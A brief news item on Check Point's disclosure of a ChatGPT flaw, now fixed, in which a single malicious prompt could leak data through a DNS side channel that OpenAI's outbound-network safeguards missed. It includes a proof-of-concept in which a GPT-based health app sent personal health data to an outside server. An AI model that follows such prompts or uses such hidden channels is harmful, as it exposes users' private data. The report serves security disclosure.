OpenAI touts robust data security for its AI offerings, but Check Point has uncovered vulnerabilities in ChatGPT that previously allowed data leaks via a DNS side channel. In February, a significant flaw was resolved, enabling a single malicious prompt to exploit an exfiltration channel hidden within ChatGPT interactions. Check Point’s researchers revealed that while OpenAI implemented various safeguards against direct outbound network requests, they overlooked DNS data transmission, creating a security loophole. The researchers demonstrated potential exploitation through proof-of-concept attacks, including a GPT-enabled app analyzing personal health data, which unknowingly transmitted sensitive information to an external server. Such vulnerabilities raise concerns for industries governed by strict regulations, leading to possible GDPR or HIPAA violations if corporate AI services experience data breaches. OpenAI addressed this issue on February 20, 2023, yet the incident highlights the ongoing challenges of AI data security.
Source link
